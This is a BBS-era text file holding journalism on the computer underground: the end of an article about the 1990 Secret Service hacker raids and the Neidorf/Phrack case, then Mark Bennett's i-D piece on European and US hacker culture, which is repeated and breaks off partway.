    And 8 days after the Atlanta busts, the secret service arrested one of Phrack's two co-editors, a 19 year old U of Missouri student named Craig Needorf. The indictment against him, signed by the US Attorney in CHicago, named the Atlanta hacker Riggs as a coconspirator in what was presented as a seeply disturbing criminal scheme. In 12/88, the feds claimed Riggs illegally accessed Bell South mainfrmaes and downloaded to his own computer a copy of the "highly proprietary and closely help computer program that controlled and maintained the E911 system"--he had, in other words, taken in his hands the lives and saftey of the millions of people who depended on Bell SOuth's E911 network. Worse than that, though, he proceeded tto transfer this potentially terrorist bundle of data--- valued by the phone company at $79,449-- to a public BBS in Lockport, Ill. From there Neidorf, whose role in the underground was that of a journalist rather than a hacker, downloaded, edited, and disseminated the data via Phrack, spreading he poisonous code throughout the underground. 
    This was scary. Wasn't it?
    Well actually the "highly proprietary and closely held" data in question was in fact not a program but a text file, and a pretty dull one at that. Lyrically titled the "Bell South Standard Practice 660-255-104SV Control Office of Administration of Enhanced 911 Services for Special and Major Account Centers", the file had been included in the February 1989 Phrack and was widely available on BBS's. Readers were treated to a breif 20k (anout 6 pages) of bureaucratese detailing the obligations and procedures of all parties involved in the maintainence and operazation of the computerized E911 system. The file itself no more controlled the system than the organizational chart at the White House controls the nation. At worst, it could be used to aid a social engineering (hacker term for conning info out of coporate types), which might, way down the line, result in a breach of 911's security. At most, it's value to Neidorf was roughly that of underwear stolen in a panty raid.
    But it cost him plenty. Neidorf lost his PC, he lost his access to the universities computers (through which he had legitamitaly distributed the newsletter over Internet and other networks), and he faced a maximum penalties of 31 years in prison and a $122,000 fine. The 'zines founder and coeditor, a childhood friend of Neidorf known as Taran king. hasn't spoken to him since the arrest. For all intents and purposes, Phrack was over. And to anyone at all sensitive to the changing nature of the press in a computerized society, that was the scary part of the case: under suspicion of disseminating stolen info, a publications was effectivaly silenced. If the New York Times had lost its printing presses under similiar circumstances, there would have been media hell to pay. In fact, the Time had faced a similiar circumstance nearly 2 decades befor, when it defied federal legal pressure by publishing stolen documents Daniel Ellsberg had stolen from the Pentagoon. The Times stood on their First Admendments rights and won that round hands down.
    Phrack, however, was not the New york Times. It was just two modem-equipped college kids, one of whom stood only a slim chance of winning his criminal case with the 1ST admendment arguements. Opting wisely for the better part of valor, Neidorf's lawyer, Sheldon Zenner, spent pretiral months hammering away at inconsistensies and irrelevanceis in the terms of the indictment. Finally, on 6/11, the prsecution handed down a drastically revised indictment. Zenner's efforts had paid off.
    Sort of. The good news was that a number of counts based on the COmputer Fraud and Abuse Act had been dropped. The bad news was that through creative interpretation of federal wire fraud sttues the prosecution had frightingly expanded Neidorf's alleged role in the conspiracy. No longer was he charged merely with recieving  and transporting the "stolen" E911 document (newly devalued to $23,900, perhaps in competition with an ad-parody in 2600 offereing the file at an unbelievable low price of $59,499)-- now Phrack itself had become part of a larger scheme to "solicit information about hor to illegally access computers and telecommunications systems from computer hackers." In support of this charge, the indictment named five Phrack articles published in 1988. None of the five newly introduced articles was stolen property, most were of a general technical nature, and one was simply news, announcing an upcoiming phreak.hacker convention and even inviting law inforcement officials and security professionals to attend. 
    Nothing in these article was any more dangerous than what you might expect to get out of The Cuckoo's Egg, except maybe the impression that hacking was nothing to be ashamed of. Zenner had no choice now but to take the first. Fourtunately, by now Neidorf had picked up some impressive alies. Late in May, Rabinowitz, Boudin, the venrable constitutional law firm that defended Daniel Ellsberg in the Pentagon Papers trial, began offering assistance to Neidorf and other victims of the raids. Much of their tab, apprantly, would be picked up by a lobbying group called the Electronic Frontier Foundation then being setup by multimillionaire Mitch Kapor-- the creators of Lotus 123 spreadsheet. Neidorf's trial was finally shaping up into the 1st admendment test case it was meant to be all along.
    But civil libeterians who saw only constitutional principles at stake in the Raids ignored the real bone of contention for both feds and hackers: the right to life of a subculture dedicated to reckless exploration of the electronic frontier. It was a right hotly asserted in the remaining hackersymp publications (2600, CUD) and in the lone screens of posted BBS's around the country. Five days after Neidorf's arrest, in fact, a Univ. of texas student uploaded into the networks a fervent apologia for the computer underground.
    "My name is Chris," It began, "but to the computer world, I am Erik Bloodaxe. I have been a member of the group known as LoD since it's creation, and admittedly I have not been the most legitamite user around, but when people start hinting at my supposed Communist-backed actions, and say that I am involved in a wolrd-wide conspiracy to destory the nations computer and/or 911 network, I have to speak up and hope that people will take what I have to say seriously..."
    He went on to place Rigg's "theft" of thge Bell SOuth file in subculture prespective: "This is usually standard procedure: you get on a system, look around for interesting text, buffer it, and maybe print it out for posterity. No member of LoD has ever (to my knowledge) broken into another system and used any info gained from it for personal gain of any kind... with the exception of maybe a bog boost to his reputation around the underground...
    "People just can't seem to grasp the fact that  a group of 20 year old kids just might know a littlemore than they do," he concluded, "and rather than make good use of us, they would rather just lock us away and keep on letting things pass by them... You can't stop burglars from robbing you when you leave the doors unlocked and merely bash them in the head with a baseball bat when they walk in. You need to lock the door... When you leave the doors open, but lock up the people who can close them for you, another burglar will just walk right in."


In the early morning of March 1, 1990, Erik Bloodaxe awoke in his Austin home with a cocked pistol held to his head and a Secret Service agent telling him to get out of bed.
    Across town, his friend Loyd-- the Mentor, a 26 year old LoD member who had retired from active hacking a year earlier but had continued to run a h/p bbs out of his house-- was getting the similiar treatment. Erik Bloodaxe had been expecting this for a while, so feds weren't able to cart of much in the way of hardware from his place: a big bag of TV cable wire, some phone parts, some LoD stationary, a full sized Pac Man game. The mentor lost several thousands of dollars worth of computer equipment. No arrest were made, no charges specified. But the feds made it quite clear what the raids were all about.
    They weren't so generous to the Mentor's boss, board game publisher Steve Jackson. ALl he knew was that when he and his employeed showed up that morning they found the enterance barred. Inside, police and secret service agents were busy tagging and bagging: they took computers, a laser printer, and a dick containing every copy of the rules to a new role playing game the company was preparing to ship within a few days. The game was a futuristic adventure called GURPS Cyberpunk, and the Mentor was it's author. When Jackson went down to the secret service offices the next day to get an explanation, they offered only the absurd accusation that the game he had been banking on to get him through the year's first quarter was a "handbook form computer crime".
    The secret service help on to Jackson's property for almost 4 months. During that time loss of sales revenue compounded Jackson's original losses of equipment replacement and data recovery. By the time he patched together a marketable version of the rule book form earlier drafts, his estimate of the raid's dmagae had reached $125,000. Since March, his company's been on the the brink of bankruptcy. The secret service played fast and loose not only with Jackson's freedom of speech, but with his freedom from unreasonable search and seizure as well, and it's hard to see what hard evidence they might have got out of the raids on his offices. But all in all they must have been rather pleased with themselves that day, because the bottom line in the austin busts was this: the feds had scored big. With half it's members now under indictment or threat of indictment, and the other half lying very low, LoD was as close to dead as it had ever been.


So it was something of an anticlimax when on May 9 prosecutors and secret cervice ops in Phoenix, Arizona announced the culmination of the raids of 1990: Operation Sun Devil, a 3 day sweep starting on Monday may 7, in which over 150 secret service agents, working with state and local police, executed 28 search warrents, most of them sealed, in 14 cities across the country, netting 42 computer and about 23,000 disks.
    As infotainment, the may mobilization barely competed with the sentencing of Robert Morris Jr. three days prior (he got of relatively light: $10,000 and 400 hours community service). Federal mouthpeices at the Phoenix press conference spoke dramatically about Operation Sun Devil's aversion of "impending dangers" to the public, but the truth was that these latest busts weren't all that juicy-- for the most part they took out computer youthj suspected of long-distance phone code abuse and credit-card fraud. Try as the feds might, it's hard to get the general public to feel for the quasi-monopolies victimized by these activities. And through 2600 billed this new attack as" the largest hacker raid in history", there was somefeeling in the computer underground that it's targets hardley deserved the name-- in the h/p universe, "k)dez kidz" (who spend most of there time cracking and abusing calling card numbers) ride low on the totem pole of respect, just ahead above the despised "warez d00dz" (who spend most of their time trading pirated software); "carding" seems to derive it's slightly higher consideration only from the fact that it's riskier.
    Which doesn't mean this blow didn't hurt. For one thing, codes kids and carders weren't the only people caught. SOme sophisticated hackers went down too-- like MoD's Crazy Ediie, arrested by state police on Long Island for hacking into a Mass. business's Unix. And several of the raidees ran boards, the heart of what ever community exists in the computer underground-- in CHicago, the legendary Ripco board was hit, and locally the 15 year old operator of one of New York City's last h/p boards watched with his mother as shotgun wielding secret service agents carried his amiga away. Perhaps most signifigant, though, inthe long run, was the damage done to the computer undergrounds ecology: looked down on or not, codes kids and wares doods have always formed a pool of potential full-leged phreaks and hackers. By clmaping down on code abuse, Op. Sun Devil was putting the screws onthe underground for years to come.
    So mayber Sun Devil was a coup de grace. And maybe it was just a mop-up action. Either way, the feds had shot thier load. There was nothing left to do now but stand back and assess the damage.


Standing in Wawshington Square Park on a brisk March Sunday, Bandito, age 16, shared with the other members of MoD a dream he had when he was just beginning to phreak:
    "I was going up in this elevator to see my friend, and like this woman started coming on to me, right? I say, oh wow right? Then like we went into her apartment, and like she put her briefcase down, and it was like NY Telephone, right? And i was like, Hey, if you want me to goto bed with you, you have to give me everything, right> And all the printouts started coming out, and on the printouts was like every sisngle Unix, all the Bell Unixes, and everything was echoed, it like all showed up, it wasn;t like the password wasn't there. You even saw like the modem commands and like the phone number of the system. i was like, Cool! She's like c'mon.... I was like No,no,no, I gotta photocopy this..."
    Which gives you some idea of what the feds are up against. If even the adlescent sex drives can't overcome the urge to hack, what makes a bunch of suited-up cartoon dads think they can?
    Their guns maybe. Thier money, thier courts, their prosecutors. there's no doubt about what these tools can do to individual offenders. Right now dozens of hacker's across the country await trial or indictment, some of them no doubt swearing off computers for life. Down in Atlanta, the Prophet, the Leftist, and the Urbile, have all pleaded quilty. And next wekk, starting on July 23, Craig Neidorf's case goes to trial in chicago. if he loses, he looks at 65 years in jail and over a million dollars in fines. If he wins, so does freedom of the press, but that may be a small consolation to him: his hardl;y well-to-do family's legal fee's have already topped $60,000. People in contact with him say his college funds are now completely exhausted.
    But what effect underground as a whole is hard to guage. Some hackers, pointing to the drastically reduced number of h/p boards and the increasing stigmatization of hacking, have argued that the Raids of '90 represent a crisis the subculture may not survive. A few weeks ago a caller identified as Scum of the Earth left this note on an underground board somewhere in the 718 arae. bemoaning the prospects for a transfusion of young blood from today's computer-literate pubescents: "Kids today couldn't give a rats-ass about hacking, they are too busy playing fucking Nintendo and watching TMNT all day long. Yes, there are more home computers today then there were back then, so you may think that there will be more hackers coming onto the scene. Wrong, computer today are part of everyday life, they aren't as fascinating to kids now as they were back in the early 80's... all these bust in the media, a lot of people are scared... So, if this generation dies out (ie: get's busted, stagnates, retires), I don't think hacking has much of a future."
    But there's ample evidence that the present generation is already creeping back to full strength. A new, bootleg Phrack has popped up-- of unknown authorship and dubios quality, but the thought counts. And in the latest 2600, 2 unraided LoD members-- Phantom Phreaker and Doom Prophet-- have dared to fly their colors with an article on telco anti-phreak devices. 2600's open monthly meetings too, show no signs of deterioration. Held in a mini-mall in the bowles of Manhattan's Citicorp building, they remain lively, crowded hangouts they've always been.
    At this month's meeting you could've met Scum of the Earth, a long haired 20 something in a tie-dyed t-shirt who is, like most hackers, a much nicer person than you'd guess from posts on boards. Acid Phreak was there too, and Phiber Optik, and most of the rest of MoD. The phreaks from Queens haven't been indicted, though they haven't seen their computers since the day they were confiscated. Acid insiss that they've been keeping their noses clean. Other people present the meeting, however, hinted at new m.o.'s developing inthe clampdown climate. One longtime undergrounder, a raids casualty, confessed in a stage whisper to doing some interesting things frompayphones, using a portable computer. "He's hooked," said the Seeker, smiling in amazement. "He won't quit till he goes to jail." The seeker himself is calling it quits for a while. "Wierd and arcane noises" on his line have him convinced it's tapped. Corrupt, too, is keeping a low profile till things blow over. MoD's younger members, however, show no such restraint. In Scum of the Earth's analysis, they should be frying their minds with Nintendo, but the hacking bug has bitten them good. Ask the Potent Rodent, who gives his age between 13 and 16, why he continues such risky activities as exploring phone switched and setting up parasite boards on hacked unixes and he'll shrug: "I don't know. I just have to."
    In the end the, though, the greatest sourceof optimism for hackers is history. they've been through this before. Waves of busts ar endemic, and though they've always been smaller than this year's, they've often been as scary. In 1987 one such wave slowed the computer underground to near-hatl-- Phrack went on hiatus, LoD was on ice. But within a year the scene was up and running again, and in Phrack's combeback issue an undergrounder known as Knight Lightning launched a cocky minimanifesto: 
    "Knowledge is the key to the future and it is FREE. The telecommunications and security industries can no longer withhold the right tolearn, the right to explore, or the right to have knowledge. The new age is here and with the use of every *LEGAL* means available, the youth of today will be able to teach the youth of tomorrow."
    A smirk underlined the word legal of cource, but the earnestness of the lines was otherwise pure. It's possible Knight Lightning still fails to see any irony in them, or in  their implication that the future of political struggle rests on a community of kids who wet-dream about forbidden data, whostand with one foot on cyberspace and the other in Wayne's World. But that's understandable. If the governments war on hackers has done nothing else, it has given their teen rebel posturing a wieght it should never have to bear. Knight Lightning should know: his real name is Craig Neidorf, and the article in which he wrote those words is count two of his indictment.
    He could get five years for it.


X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X
X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X
X/\/                                                                    \/\X
X\/X                        - Digital Underground -                     X\/X
X/\X      Story by Mark Bennett. Published in i-D Technology Issue      X/\X
X\/X                                                                    X\/X
X/\X            Transcribed by Phantasm. 12th September 1992            X/\X
X\/X                                                                    X\/X
X/\X    Unauthorised Access UK. Online 10.00pm-7.00am. +44-636-708063   X/\X
X\/\                                                                    /\/X
X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X
X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X

They've got a file on you. It's on computer. And that computer is connected
to a global network. Who's going to stand up for our civil liberties in the
digital era? Can the anarchic activities of hackers and cyberpunks make them
freedom fighters for the information age?
 
CYBERPUNK
TECHNOLOGY

Cyberspace, the Net, Non-Space, or the Electronic Frontier call it what you
will, but it's out there now, spread across the world like an opulent
immaterial spider's web, growing as each new computer, telephone or fax
machine is plugged in, as satellites close continental divides, hooking
independent phone systems together. It's almost a living entity - the
backbone is the various telephone exchanges, the limbs the copper and fibre-
optic links. Increasingly the world is shifting to this unseen plane. Your
earnings, your purchasing patterns and your poll tax records are processed
there. You may not realise it exists, but it's part of everyday life. As
John Barlow, writer and electronic activist puts it, "Cyberspace is the place
you are when you're on the telephone."

As life moves to this electronic frontier, politicians and corporations are
starting to exert increasing control over the new digital realm, policing
information highways with growing strictness. Before we even realise we're
there, we may find ourselves boxed into a digital ghetto, denied simple
rights of access, while corporations and governments agencies make out their
territory and roam free. So who will oppose the big guys? Who's going to
stand up for our digital civil liberties? Who has the techno-literacy
necessary to ask a few pertinent questions about what's going down in
cyberspace? Perhaps the people who have been living there the longest might
have a few answers.

You could argue that hackers have been the most misrepresented of all sub-
cultures. In the mainstream press they've been cast as full-blown electronic
folk devils, either dangerous adolescents and electronic vandals or malevolent
masterminds in the pay of organised crime or evil foreign powers. Others have
tried to put forward a rather romantic view of hackers as freedom fighters
for the information age. And the cyberpunk media industry that grew from
William Gibson and Bruce Sterling's science fiction has mytholised them as
digital rebels, computer cowboys.

The truthis more complex. As more and more people explore cyberspace, it's
becoming harder than ever to make generalisations about a hacker ethic, to
even figure out what hackers are doing and why. All you can say is that
between them they have created a genuine digital underground, an electronic
bohemia where diverse subcultures can take root, where new ideas, dodgy
tech and weird science can flourish.

In Europe, the centres for hacking activity are Germany, Holland and
Italy. UK hacking remains relatively stagnant and disorganised. In part it's
down to the relatively high cost of computers and telephone calls. In part
it's down to a difference in attitude. It seems typical that the most famous
hack in Britain came when two hackers broke into Prince Philip's electronic
mailbox. As Andrew Ross points out in an essay on the subject in Strange
Weather, hacking in the UK has a quaint, 'Little England' air about it. Hugo
Cornwall, author of The Hacker's Handbook, has compared hacking to electronic
rambling and has suggested developing a kind of Country Code for computer
ramblers. It's all very benign, a matter of closing gates behind you,
respecting the lands you cross and never ignoring the 'No Trespassing' signs
you might encounter. As Ross says, this amounts to a kind of electronic
feudalism, with digital peasants respecting the inherited land rights of
information barons and never asking bigger questions about property, state
surveillance and the activity of corporations and governments.
 
The Europeans tend to take a more politicised, sceptical stance. The focus
for most hacking activity on the continent is the Hamburg-based Chaos
Computer Club, which organises meetings, lectures, publishes magazines and
books on the politics of information and holds an annual conference which
usually draws hackers from around Europe. The club, who's motto is "access
public data freely while protecting private data firmly", was formed by
Wau Holland after the publication of the A5 hacking magazine Datenschleuder
in 1982. An article in the mainstream press stimulated interest and
subscribers decided to set up the club.

With home computing a minority hobby in Germany during the mid-'80s, the
club couldn't really limit itself to one type of computer as a similar club
in the States might do. Instead it cut across product loyalties and hobbyist
pettines and brought together all computer users. Similarly, the club aimed
to be as open-minded about their activites. They weren't just interested in
swapping access codes and passwords. Instead Datenschleuder published
informed speculation about the way information technology might develop.
 
Realising that the majority of the public were unaccustomed to, and in some
cases frightened of, the new technology, they attempted to open up and
demystify thre computerised landscape. Alongside the regular magazine, they
have published four books on computers and hacking, including the essential
Die Hacker Bible One which reprints back copies of Datenschleuder and the
first 50 issues of TAP (aka Technological Assistance Program), a magazine
put together back in the '70s by phone phreakers (early tech-pranksters who
gained free phonecalls with gadgets like Blue Boxes and touch pads).
 
Like most hackers, the Chaos Club takes a critical stance towards the phone
companies of the world. As in the UK, the Germans have to live with high
prices for their phone services, something which has prevented the growth of
a network of computerised bulletin boards as in the US. In general,
communications regulations are very restrictive in Germany. Something as
simple as acquiring an extension telephone requires applications for
permission, excessive paperwork and extra charges. In this area the club acts
rather like a technoliterate consumer group, fighting to loosen the phone
company's monopoly and open up the system's potential to ordinary punters.

In many ways, the Chaos Club is determinedly respectable, at times more like
a special interest pressure group than a hacking club. These days they're
particularly concerned to distance themselves from what they see as
irresponsible elements within the digital underground, perhaps because some
of their members have performed some of the most notorious hacks in the
past. Hackers from the Chaos Club bust into NASA's system in the mid-'80s. In
addition, three years ago, it became apparent that some of the club's
members had hacked into Western military computers and tried to sell what
they found to the KGB. This somewhat sullied the carefully cultivated image
of openness and responsibility and the club has been through something of a
crisis. More recently, confidence has picked up and the last two annual
conferences have attracted around 500 hackers and other interested parties.
 
These annual get-togethers have become much more than just illicit swap meets
for Europe's computer intruders. They're part digital be-in, part electronic
think tank, part R&D lab, part informal high-tech trade fair. The centrepiece
is still usually the hacking rooms. Hooked into the phone system by means of
bundles of illegal extension cords, these feature rows of terminals on which
visitors could access networks around the world, call up the club's various
databases or tele-conference with members who couldn't make the event.
 
The 1991 event featured a room housing various rudimentary explorations into
the world of 'brain hacking'. Here people were swapping ideas about the
possibilities of making a real life version of the electrodes which feature
in William Gibson's cyberpunk novels and which allow users to jack into a
network and move from computer to computer purely by thought. The technology
that was actually up and running was little more than a biofeedback system
(basically an EEG machine which displays a user's brain waves in order to
help them to achieve particular frequencies and corresponding mental
states). Some present were talking about actually developing a brain-
controlled system, in which information could be moved around the screen
via something like ESP or telekinesis.
 
More functional future tech was demonstrated at the same conference by John
Draper, aka Captain Crunch, one of the first phone phreakers and a legend in
hacking circles, who had been flown in by the Virtual Travel Project, an
organisation designed to bring East and West together via technology. He
brought along an old Panasonic videophone which comes complete with a two
inch square display lens and a small camera. When hooked up to standard
telephone lines, the videophone can transmit still images taken by the built
in camera and transmit them to a similar telephone or computer equipped with
the right software. Draper was able to visually connect with the US in a
conference call that hooked up Hamburg, New York, the Electronic Cafe in
Santa Cruz in California and San Francisco.
 
Although the Chaos Club is the best-known European hacking group, others are
beginning to achieve a higher profile, particularly the self-styled Italian
Cyberpunks, who are based in Milan and produce the magazine Decoder, which
reads like a politically tougher version of Mondo 2000 and mixes hacker info
and socio-political opinion pieces on information technology with interviews
with the likes of William Gibson, underground comics and scratchy DIY
graphics. With its roots in Italian anarchist traditions and connections to
the free radio movement of the '70's, the Cyberpunks have tried to theorise
hacker activity and present it as a coherent form of political
protest. They're taken relatively seriously by Italian society at large and
their recently published Cyberpunk Anthology managed to make it onto the
bestseller list for several weeks. They are currently working on an English
translation which they hope to publish here (in the UK) by the Summer.
 
Like the Chaos Club, the Cyberpunks are less hung up on getting hold of the
latest technology and more interested in educating the public and spreading
information. Invited to participate in the Santarcangelo Arts Festival, held
in Rimini last Summer, they organised lectures on virtual reality and multi-
media, flying in speakers from Germany and Britain and running an
'information wall'. This comprised of a wall of old TVs playing feeds which
were processed by an Amiga video editing system and mixed raw footage of the
festival events, computer graphics and the Cyberpunks' own videos. There
were also plans to set up a pirate TV station and broadcast in a narrow 2km
band towards Rimini. Unfortunately, after technical problems and concern
voiced by members of the Mutoid Waste Company (also present at the festival)
that the material transmitted might be X rated, this had to be called off.

Whilst groups in Europe seem to be gradually evolving into artful campaigners
and consciousness-raising pranksters, the majority of US hackers have
remained simple tech freaks. However, things may be changing. US hacker
culture has been going through a crisis in the last two years. In a full-
blown moral panic, they have been systematically hunted down by the Secret
Service and have become the focus for hysteria reminiscent of the red scares
of the '50s. (A time magazine cover from 1988 talked about "The Invasion Of
The Data Snatchers".)

Things began to happen in January 1990 as the Secret Service began to arrest
members of The Legion Of Doom, one of the most celebrated US hacker groups,
on suspicion of having entered the computer systems of the Bell South
company. Although in many cases no charges were filed, electronic equipment
and discs were confiscated. things came to a head with Operation Sun Devil
in May 1990, which involved 28 raids in 14 days; 42 computers and 23,000
discs were confiscated, many of which have never been returned. Government
agents carried out dawn raids on teenage bedrooms across the US, confiscating
calculators and answerphones. All quite comical. Except things began to get
more serious. Raids became like precision strikes on terrorists and teenagers
found themselves threatened with jail sentences for accessing computer
systems with no password, copying files or just being vaguely
mischievous. Their offence might have been no more than the electronic
equivalent of walking on the grass or breaking and entering, but the
punishment they faced was ten times more severe.

In addition, the authorities began to target and close down electronic
bulletin boards. In the States, there are now boards for every obsession
going, every hobby, belief, vice or fad. So many that regulation of the kind
of information being circulated is increasingly difficult. For that reason,
it has been argued that the powers that be don't like the idea of boards
per se. Although a lot of the information that is circulated on some of the
more underground boards (how to build bombs, for example) is available
elsewhere, they feel spooked by the thougth that it can be accessed by
anyone with a computer.
 
They feel particularly spooked by the idea of hacker bulletin boards, and
have begun to charge people merely for allowing 'dangerous information' to
pass through their systems.

Hacker reaction to all this has been varied. After receiving prison sentences
for their activities, the majority of the Legion Of Doom have decided to go
legit and have set up as Comsec Data Security Corporation, a computer
protection consultancy. Others have taken a campaigning stance reminiscent
of the Europeans. The East Coast hacker quarterly 2600, which published
hardcore hacking info on phreaking and accessing computer networks, has tried
to highlight the hypocrisy of the hacker busts. "An individual cannot take
a big credit checking corporation like TRW to court because they collect
personal data on them without his or her permission," 2600 editor Emmanuel
Goldstein comments. "But TRW could claim its privacy was violated if a hacker
figures out how to access their system." Whats wrong with this picture...

Other organisations have been set up to raise concern about civil liberties
and freedom of speech, the most high profile being the Electronic Frontier
Foundation, which was set up by Mitch Kapor, a millionaire software pioneer,
along with other big cheeses from the computer industry (including Steve
Wozniak of Apple, an ex-phone phreaker), as a direct response to anti-hacking
hysteria. A self-confessed hacker/software pirate in the '70s, Kapor is
worried that the current panic may lead to the formation of restrictive
regulations which may hamper the development of cyberspace in the
future. However he isn't in favour of legalising hacking. He thinks hackers
should still be punished.
 
Although the EFF has had some success in its moves to end Secret Service
excesses, not all hackers are happy with the way it draws a line between the
old '60s hackers and modern computer intruders. "There are a lot of
similarities between these 15-year-olds who are playing around in corporate
computers and the 40-year-olds who played around with phones and are now
writing software somewhere," comments Emmanuel Goldstein. "They may be legit
now, but they weren't always legitimate". Goldstein is also sceptical of the
'cyberpunk' tag which hackers appropriated from the fiction of William Gibson
and Bruce Sterling, dismissing it as a fashion thing. Whilst it may have
helped to give hackers a sense of identity, the image of leather-clad
anti-social rebels backfired when the authorities started to take it
seriosly.
 
Something which places original cyberpunk writers like Bruce Sterling in a
tricky position. "I've had law enforcement people tell me that if they see a
copy of (William Gibson's) Neuromancer in a kid's bedroom when they're doing
a raid, they know he's bad, he's gone," he observes. "There are people who
use the word 'cyberpunk' as a synonym for computer criminal now. There's
little that we can do about it really." Except write a book, something
Sterling decided to do when anti-hacker hysteria reached his home town of
Austin, Texas. The Chicago Computer Fraud and Abuse Task Force seized
hardware and software from a texas SF publisher and made statements to the
local press that cyberpunks were dangerous. "Being quite well-known as a
cyberpunk myself, I thought I'd better find out what was going on". The
results of his investigations will be published as The Hacker Crackdown in
October in the US.
 
As an outsider, Sterling offers a refreshingly sceptical perspective on the
scene. Of the 5,000 or so hackers currently practicing in the States, he says
the majority are just mischievous teens, electronic joyriders who are more
curious than malicious. Most of them don't hack beyond the age of 22. They
get bored and get a life outside of cyberspace. He laughs off the idea that
hackers might be seen as radicals. "The idea that these are like fresh-faced
idealistic genius kids who are linked arm-in-arm to deal a telling blow to
the establishment is just bullshit. They all hate each other's guts. They
turn each other in at the drop of a hat."

Far from being proto-political rebels, he argues that young US hackers are
actually political footballs, part of a larger game which is about the future
and management of cyberspace. Thats why the rich software entrepreneurs of
the Electronic Frontier Foundation have become involved. "The EFF and their
civil liberties fellow travellers are an interest group like any other. They
shouldn't be shrouded in this air of 'Oh they're old '60s people, look how
idealistic and non-materialistic they are. These guys are pretty sharp
operators who've made a lot of money in the computer industry, and would now
like to get their mouse gripping mitts on some lever of political power that
is consonant with the amount of money they have and the influence they wield
in the business world".
 
A cynic might argue that the EFF aren't just concerned with the freedom of
speech. They really want to make sure that in the heat of hacker hysteria, a
set of excessive laws don't get passed which might restrict their business
operations in the future. This kind of thing is only to be expected, since
as Sterling says, the electronic community is expanding daily. In the rush to
go digital, hackers may even find themselves sidelined. "Every aspect of
society is moving into electronic networking and that includes hippies,
criminals, lawyers, politicians, bikers, knitting societies, even cops. Cops
have their own bulletin boards now. There are hacker cops. All these
subcultures and sub-groups are moving in, and in a while what was once called
hacker culture may get swamped by other kinds of electronic bohemia."
 
US hackers may have acted as the pioneers of the new electronic
landscape. But like the real pioneers who first explored the American West,
they may find it difficult to find a foothold in the new communities they
helped to create. The simple thing is to go in to business for the people
they formerly thought of as the enemy. Alternatively they could band together
in informal vaguely politicised pressure groups like the Europeans. But they
need to update their act. Otherwise they could even wind up a dying
breed. "In the end the thing about American hackers that'll kill them off is
that they're dilettantes," Sterling concludes. "They're not getting any
money for this. They're doing it for free, because it's like a cool
subculture do. They're doing it for power and knowledge. But anything these
jerk-offs can do for power and knowledge, a real operator can do for a lot
of money."

The pioneer age is over. The Net is here to grow. And as the digital
community expands and corporate control of computerised data increases,
hackers will have to raise their political consciousness if they intend to
fulfil their mythical role as electronic watchmen.

CONTACTS

Italian Cyberpunk magazine and book:          Dutch hacking magazine:
Decoder                                       Hack-Tic
Shake Edizioni                                PO Box 22953
Via Cesare Balbo 10                           1100 DL Amsterdam
20136 Milan, Italy                            The Netherlands

2600 Magazine - subscriptions, back issues and uncut NTSC video:
2600 Subscription Dept
PO Box 752
Middle Island
New York 11953-0752
USA

Tel: 0101 516 751 2600

Back issues of TAP can be found in the classified section of 2600.
 
Die Hacker Bible 1 is available in bookshops in Germany.

                Transcribed by Phantasm. 12th September 1992

X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X
X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X
                Downloaded From P-80 Systems 304-744-2253


Unauthorised Access UK  0636-708063  10pm-7am  12oo/24oo

X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X
X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X
X/\/                                                                    \/\X
X\/X                        - Digital Underground -                     X\/X
X/\X      Story by Mark Bennett. Published in i-D Technology Issue      X/\X
X\/X                                                                    X\/X
X/\X            Transcribed by Phantasm. 12th September 1992            X/\X
X\/X                                                                    X\/X
X/\X    Unauthorised Access UK. Online 10.00pm-7.00am. +44-636-708063   X/\X
X\/\                                                                    /\/X
X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X
X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X

They've got a file on you. It's on computer. And that computer is connected
to a global network. Who's going to stand up for our civil liberties in the
digital era? Can the anarchic activities of hackers and cyberpunks make them
freedom fighters for the information age?
 
CYBERPUNK
TECHNOLOGY

Cyberspace, the Net, Non-Space, or the Electronic Frontier call it what you
will, but it's out there now, spread across the world like an opulent
immaterial spider's web, growing as each new computer, telephone or fax
machine is plugged in, as satellites close continental divides, hooking
independent phone systems together. It's almost a living entity - the
backbone is the various telephone exchanges, the limbs the copper and fibre-
optic links. Increasingly the world is shifting to this unseen plane. Your
earnings, your purchasing patterns and your poll tax records are processed
there. You may not realise it exists, but it's part of everyday life. As
John Barlow, writer and electronic activist puts it, "Cyberspace is the place
you are when you're on the telephone."

As life moves to this electronic frontier, politicians and corporations are
starting to exert increasing control over the new digital realm, policing
information highways with growing strictness. Before we even realise we're
there, we may find ourselves boxed into a digital ghetto, denied simple
rights of access, while corporations and governments agencies make out their
territory and roam free. So who will oppose the big guys? Who's going to
stand up for our digital civil liberties? Who has the techno-literacy
necessary to ask a few pertinent questions about what's going down in
cyberspace? Perhaps the people who have been living there the longest might
have a few answers.

You could argue that hackers have been the most misrepresented of all sub-
cultures. In the mainstream press they've been cast as full-blown electronic
folk devils, either dangerous adolescents and electronic vandals or malevolent
masterminds in the pay of organised crime or evil foreign powers. Others have
tried to put forward a rather romantic view of hackers as freedom fighters
for the information age. And the cyberpunk media industry that grew from
William Gibson and Bruce Sterling's science fiction has mytholised them as
digital rebels, computer cowboys.

The truthis more complex. As more and more people explore cyberspace, it's
becoming harder than ever to make generalisations about a hacker ethic, to
